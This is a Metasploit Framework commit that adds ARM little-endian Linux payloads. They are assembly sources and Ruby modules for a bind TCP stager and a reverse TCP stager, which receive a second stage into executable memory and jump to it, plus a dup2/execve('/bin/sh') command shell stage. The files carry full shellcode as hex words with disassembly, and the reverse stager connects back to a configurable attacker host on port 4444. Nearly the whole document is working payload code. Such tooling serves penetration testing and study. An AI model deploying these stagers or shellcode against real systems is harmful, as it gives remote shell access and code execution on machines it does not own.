Land #1879, @dcbz ARM stagers
commit
07c99f821e
|
@ -0,0 +1,34 @@
|
|||
@@
|
||||
@
|
||||
@ Name: generic
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ dup2 / execve("/bin/sh") stage for Linux ARM LE architecture.
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
int dup2(int oldfd, int newfd);
|
||||
mov r7,#63 ; __NR_dup2
|
||||
mov r1,#3
|
||||
up:
|
||||
mov r0,r12 ; oldfd (descriptor stored in r12 by the stager)
|
||||
sub r1,#1 ; newfd
|
||||
swi 0
|
||||
cmp r1,#1
|
||||
bge up
|
||||
@ execve(const char *path, char *const argv[], char *const envp[]);
|
||||
mov r7,#11 ; __NR_execve
|
||||
add r0,pc,#24 ; *path
|
||||
sub sp,#24
|
||||
str r0,[sp,#-20]
|
||||
mov r2,#0
|
||||
str r2,[sp,#-16]
|
||||
add r1,sp,#-20 ; *argv[]
|
||||
mov r2,r1 ; *envp[]
|
||||
swi 0
|
||||
.string "/bin/sh"
|
|
@ -0,0 +1,101 @@
|
|||
@@
|
||||
@
|
||||
@ Name: stager_sock_bind
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux portbind TCP stager for ARM LE architecture.
|
||||
@
|
||||
@ Socket descriptor in r12.
|
||||
@
|
||||
@ Assemble with: as stager_sock_bind.s -o stager_sock_bind.o
|
||||
@ Link with: ld stager_sock_bind.o -o stager_sock_bind
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Bind TCP Stager
|
||||
@ meta-description=Listen on a port for a connection and run a second stage
|
||||
@ meta-authors=nemo <nemo [at] felinemenace.org>
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armle
|
||||
@ meta-category=stager
|
||||
@ meta-connection-type=bind
|
||||
@ meta-name=bind_tcp
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
@ int socket(int domain, int type, int protocol);
|
||||
ldr r7,=281 @ __NR_socket
|
||||
mov r0,#2 @ domain = AF_INET
|
||||
mov r1,#1 @ type = SOCK_STREAM
|
||||
mov r2,#6 @ protocol = IPPROTO_TCP
|
||||
swi 0
|
||||
@ int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
mov r12,r0 @ sockfd
|
||||
add r7,#1 @ __NR_bind
|
||||
add r1,pc,#176 @ *addr
|
||||
mov r2,#16 @ addrlen
|
||||
swi 0
|
||||
@ int listen(int sockfd, int backlog);
|
||||
add r7,#2 @ __NR_listen
|
||||
mov r0,r12 @ sockfd
|
||||
swi 0
|
||||
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
|
||||
add r7,#1 @ __NR_accept
|
||||
mov r0,r12 @ sockfd
|
||||
sub r1,r1,r1 @ *addr = NULL
|
||||
mov r2,r1 @ *addrlen = NULL
|
||||
swi 0
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
mov r12,r0 @ sockfd
|
||||
sub sp,#4
|
||||
add r7,#6 @ __NR_recv
|
||||
mov r1,sp @ *buf (on the stack)
|
||||
mov r2,#4 @ len
|
||||
mov r3,#0 @ flags
|
||||
swi 0
|
||||
@ round length
|
||||
ldr r1,[sp,#0]
|
||||
ldr r3,=0xfffff000
|
||||
and r1,r1,r3
|
||||
mov r2,#1
|
||||
lsl r2,#12
|
||||
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
|
||||
add r1,r2 @ length
|
||||
mov r7, #192 @ __NR_mmap2
|
||||
ldr r0,=0xffffffff @ *addr = NULL
|
||||
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
|
||||
mov r4,r0 @ fd
|
||||
mov r5,#0 @ pgoffset
|
||||
swi 0
|
||||
@ recv loop
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
add r7,#99 @ __NR_recv
|
||||
mov r1,r0 @ *buf
|
||||
mov r0,r12 @ sockfd
|
||||
mov r3,#0 @ flags
|
||||
@ remove blocksize from total length
|
||||
loop:
|
||||
ldr r2,[sp,#0]
|
||||
sub r2,#1000
|
||||
str r2,[sp,#0]
|
||||
cmp r2, #0
|
||||
ble last
|
||||
mov r2,#1000 @ len
|
||||
swi 0
|
||||
b loop
|
||||
last:
|
||||
add r2,#1000 @ len
|
||||
swi 0
|
||||
@ branch to code
|
||||
mov pc,r1
|
||||
@ addr
|
||||
@ port: 4444 , sin_fam = 2
|
||||
.word 0x5c110002
|
||||
@ ip
|
||||
.word 0x00000000
|
|
@ -0,0 +1,92 @@
|
|||
@@
|
||||
@
|
||||
@ Name: stager_sock_reverse
|
||||
@ Qualities: -
|
||||
@ Authors: nemo <nemo [at] felinemenace.org>
|
||||
@ License: MSF_LICENSE
|
||||
@ Description:
|
||||
@
|
||||
@ Implementation of a Linux reverse TCP stager for ARM LE architecture.
|
||||
@
|
||||
@ Socket descriptor in r12.
|
||||
@
|
||||
@ Assemble with: as stager_sock_reverse.s -o stager_sock_reverse.o
|
||||
@ Link with: ld stager_sock_reverse.o -o stager_sock_reverse
|
||||
@
|
||||
@ Meta-Information:
|
||||
@
|
||||
@ meta-shortname=Linux Reverse TCP Stager
|
||||
@ meta-description=Connect back to the framework and run a second stage
|
||||
@ meta-authors=nemo <nemo [at] felinemenace.org>
|
||||
@ meta-os=linux
|
||||
@ meta-arch=armle
|
||||
@ meta-category=stager
|
||||
@ meta-connection-type=reverse
|
||||
@ meta-name=reverse_tcp
|
||||
@@
|
||||
|
||||
.text
|
||||
.globl _start
|
||||
_start:
|
||||
@ int socket(int domain, int type, int protocol);
|
||||
ldr r7,=281 @ __NR_socket
|
||||
mov r0,#2 @ domain = AF_INET
|
||||
mov r1,#1 @ type = SOCK_STREAM
|
||||
mov r2,#6 @ protocol = IPPROTO_TCP
|
||||
swi 0
|
||||
@ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
|
||||
mov r12,r0 @ sockfd
|
||||
add r7,#2 @ __NR_socket
|
||||
add r1,pc,#144 @ *addr
|
||||
mov r2,#16 @ addrlen
|
||||
swi 0
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
mov r0,r12 @ sockfd
|
||||
sub sp,#4
|
||||
add r7,#8 @ __NR_recv
|
||||
mov r1,sp @ *buf (on the stack)
|
||||
mov r2,#4 @ len
|
||||
mov r3,#0 @ flags
|
||||
swi 0
|
||||
@ round length
|
||||
ldr r1,[sp,#0]
|
||||
ldr r3,=0xfffff000
|
||||
and r1,r1,r3
|
||||
mov r2,#1
|
||||
lsl r2,#12
|
||||
@ void *mmap2(void *addr, size_t length, int prot, int flags, int fd, off_t pgoffset);
|
||||
add r1,r2 @ length
|
||||
mov r7, #192 @ __NR_mmap2
|
||||
ldr r0,=0xffffffff @ *addr = NULL
|
||||
mov r2,#7 @ prot = PROT_READ | PROT_WRITE | PROT_EXEC
|
||||
ldr r3,=0x1022 @ flags = MAP_ANON | MAP_PRIVATE
|
||||
mov r4,r0 @ fd
|
||||
mov r5,#0 @ pgoffset
|
||||
swi 0
|
||||
@ recv loop
|
||||
@ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
|
||||
add r7,#99 @ __NR_recv
|
||||
mov r1,r0 @ *buf
|
||||
mov r0,r12 @ sockfd
|
||||
mov r3,#0 @ flags
|
||||
@ remove blocksize from total length
|
||||
loop:
|
||||
ldr r2,[sp,#0]
|
||||
sub r2,#1000
|
||||
str r2,[sp,#0]
|
||||
cmp r2, #0
|
||||
ble last
|
||||
mov r2,#1000 @ len
|
||||
swi 0
|
||||
b loop
|
||||
last:
|
||||
add r2,#1000 @ len
|
||||
swi 0
|
||||
@ branch to code
|
||||
mov pc,r1
|
||||
@ addr
|
||||
@ port: 4444 , sin_fam = 2
|
||||
.word 0x5c110002
|
||||
@ ip: 127.0.0.1
|
||||
.word 0x01aca8c0
|
||||
@.word 0x0100007f
|
|
@ -0,0 +1,120 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/bind_tcp'
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# BindTcp
|
||||
# -------
|
||||
#
|
||||
# Linux bind TCP stager.
|
||||
#
|
||||
###
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Bind TCP Stager',
|
||||
'Description' => 'Listen for a connection',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Handler' => Msf::Handler::BindTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 226, 'n' ],
|
||||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xe59f70d4, # ldr r7, [pc, #212]
|
||||
0xe3a00002, # mov r0, #2
|
||||
0xe3a01001, # mov r1, #1
|
||||
0xe3a02006, # mov r2, #6
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0c000, # mov ip, r0
|
||||
0xe2877001, # add r7, r7, #1
|
||||
0xe28f10b0, # add r1, pc, #176
|
||||
0xe3a02010, # mov r2, #16
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877002, # add r7, r7, #2
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877001, # add r7, r7, #1
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe0411001, # sub r1, r1, r1
|
||||
0xe1a02001, # mov r2, r1
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0c000, # mov ip, r0
|
||||
0xe24dd004, # sub sp, sp, #4
|
||||
0xe2877006, # add r7, r7, #6
|
||||
0xe1a0100d, # mov r1, sp
|
||||
0xe3a02004, # mov r2, #4
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe59d1000, # ldr r1, [sp]
|
||||
0xe59f3070, # ldr r3, [pc, #112]
|
||||
0xe0011003, # and r1, r1, r3
|
||||
0xe3a02001, # mov r2, #1
|
||||
0xe1a02602, # lsl r2, r2, #12
|
||||
0xe0811002, # add r1, r1, r2
|
||||
0xe3a070c0, # mov r7, #192
|
||||
0xe3e00000, # mvn r0, #0
|
||||
0xe3a02007, # mov r2, #7
|
||||
0xe59f3054, # ldr r3, [pc, #84]
|
||||
0xe1a04000, # mov r4, r0
|
||||
0xe3a05000, # mov r5, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877063, # add r7, r7, #99
|
||||
0xe1a01000, # mov r1, r0
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xe59d2000, # ldr r2, [sp]
|
||||
0xe2422ffa, # sub r2, r2, #1000
|
||||
0xe58d2000, # str r2, [sp]
|
||||
0xe3520000, # cmp r2, #0
|
||||
0xda000002, # ble 811c <last>
|
||||
0xe3a02ffa, # mov r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xeafffff7, # b 80fc <loop>
|
||||
0xe2822ffa, # add r2, r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0f001, # mov pc, r1
|
||||
0x5c110002, # .word 0x5c110002
|
||||
0x00000000, # .word 0x00000000
|
||||
0x00000119, # .word 0x00000119
|
||||
0xfffff000, # .word 0xfffff000
|
||||
0x00001022 # .word 0x00001022
|
||||
].pack("V*")
|
||||
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
print_status("Transmitting stage length value...(#{payload.length} bytes)")
|
||||
|
||||
address_format = 'v'
|
||||
|
||||
# Transmit our intermediate stager
|
||||
conn.put( [ payload.length ].pack(address_format) )
|
||||
|
||||
Rex::ThreadSafe.sleep(0.5)
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,113 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/core/handler/reverse_tcp'
|
||||
|
||||
|
||||
###
|
||||
#
|
||||
# ReverseTcp
|
||||
# ----------
|
||||
#
|
||||
# Linux reverse TCP stager.
|
||||
#
|
||||
###
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Payload::Stager
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Reverse TCP Stager',
|
||||
'Description' => 'Connect back to the attacker',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Handler' => Msf::Handler::ReverseTcp,
|
||||
'Stager' =>
|
||||
{
|
||||
'Offsets' =>
|
||||
{
|
||||
'LPORT' => [ 182, 'n' ],
|
||||
'LHOST' => [ 184, 'ADDR' ],
|
||||
},
|
||||
'Payload' =>
|
||||
[
|
||||
0xe59f70b4, # ldr r7, [pc, #180]
|
||||
0xe3a00002, # mov r0, #2
|
||||
0xe3a01001, # mov r1, #1
|
||||
0xe3a02006, # mov r2, #6
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0c000, # mov ip, r0
|
||||
0xe2877002, # add r7, r7, #2
|
||||
0xe28f1090, # add r1, pc, #144
|
||||
0xe3a02010, # mov r2, #16
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe24dd004, # sub sp, sp, #4
|
||||
0xe2877008, # add r7, r7, #8
|
||||
0xe1a0100d, # mov r1, sp
|
||||
0xe3a02004, # mov r2, #4
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe59d1000, # ldr r1, [sp]
|
||||
0xe59f3070, # ldr r3, [pc, #112]
|
||||
0xe0011003, # and r1, r1, r3
|
||||
0xe3a02001, # mov r2, #1
|
||||
0xe1a02602, # lsl r2, r2, #12
|
||||
0xe0811002, # add r1, r1, r2
|
||||
0xe3a070c0, # mov r7, #192
|
||||
0xe3e00000, # mvn r0, #0
|
||||
0xe3a02007, # mov r2, #7
|
||||
0xe59f3054, # ldr r3, [pc, #84]
|
||||
0xe1a04000, # mov r4, r0
|
||||
0xe3a05000, # mov r5, #0
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe2877063, # add r7, r7, #99
|
||||
0xe1a01000, # mov r1, r0
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe3a03000, # mov r3, #0
|
||||
0xe59d2000, # ldr r2, [sp]
|
||||
0xe2422ffa, # sub r2, r2, #1000
|
||||
0xe58d2000, # str r2, [sp]
|
||||
0xe3520000, # cmp r2, #0
|
||||
0xda000002, # ble 80fc <last>
|
||||
0xe3a02ffa, # mov r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xeafffff7, # b 80dc <loop>
|
||||
0xe2822ffa, # add r2, r2, #1000
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe1a0f001, # mov pc, r1
|
||||
0x5c110002, # .word 0x5c110002
|
||||
0x0100007f, # .word 0x0100007f
|
||||
0x00000119, # .word 0x00000119
|
||||
0xfffff000, # .word 0xfffff000
|
||||
0x00001022 # .word 0x00001022
|
||||
].pack("V*")
|
||||
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
def handle_intermediate_stage(conn, payload)
|
||||
|
||||
print_status("Transmitting stage length value...(#{payload.length} bytes)")
|
||||
|
||||
address_format = 'V'
|
||||
|
||||
# Transmit our intermediate stager
|
||||
conn.put( [ payload.length ].pack(address_format) )
|
||||
|
||||
Rex::ThreadSafe.sleep(0.5)
|
||||
|
||||
return true
|
||||
end
|
||||
|
||||
end
|
|
@ -0,0 +1,52 @@
|
|||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
require 'msf/base/sessions/command_shell'
|
||||
require 'msf/base/sessions/command_shell_options'
|
||||
|
||||
module Metasploit3
|
||||
|
||||
include Msf::Sessions::CommandShellOptions
|
||||
|
||||
def initialize(info = {})
|
||||
super(merge_info(info,
|
||||
'Name' => 'Linux dup2 Command Shell',
|
||||
'Description' => 'dup2 socket in r12, then execve',
|
||||
'Author' => 'nemo <nemo[at]felinemenace.org>',
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_ARMLE,
|
||||
'Session' => Msf::Sessions::CommandShell,
|
||||
'Stage' =>
|
||||
{
|
||||
'Payload' =>
|
||||
[
|
||||
0xe3a0703f, # mov r7, #63 ; 0x3f
|
||||
0xe3a01003, # mov r1, #3
|
||||
0xe1a0000c, # mov r0, ip
|
||||
0xe2411001, # sub r1, r1, #1
|
||||
0xef000000, # svc 0x00000000
|
||||
0xe3510001, # cmp r1, #1
|
||||
0xaafffffa, # bge 805c <up>
|
||||
0xe3a0700b, # mov r7, #11
|
||||
0xe28f0018, # add r0, pc, #24
|
||||
0xe24dd018, # sub sp, sp, #24
|
||||
0xe50d0014, # str r0, [sp, #-20]
|
||||
0xe3a02000, # mov r2, #0
|
||||
0xe50d2010, # str r2, [sp, #-16]
|
||||
0xe24d1014, # sub r1, sp, #20
|
||||
0xe1a02001, # mov r2, r1
|
||||
0xef000000, # svc 0x00000000
|
||||
0x6e69622f, # .word 0x6e69622f
|
||||
0x0068732f # .word 0x0068732f
|
||||
].pack("V*")
|
||||
}
|
||||
))
|
||||
end
|
||||
|
||||
end
|
Loading…
Reference in New Issue